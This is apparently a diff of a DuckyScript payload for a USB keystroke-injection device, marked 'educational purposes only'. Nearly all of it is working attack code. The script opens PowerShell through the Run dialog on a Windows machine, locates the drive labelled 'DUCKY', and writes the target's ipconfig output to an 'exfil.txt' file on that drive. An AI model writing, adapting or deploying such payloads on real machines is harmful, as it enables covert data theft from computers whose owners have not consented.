EDUCATIONAL PURPOSES ONLY -DEFINE #DRIVELABEL D +DEFINE #DRIVELABEL DUCKY EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 REM AUTHOR: Korben @@ -55,7 +55,6 @@ GUI r DELAY 300 STRINGLN Powershell DELAY 1000 -DEFINE #DRIVELABEL DUCKY STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY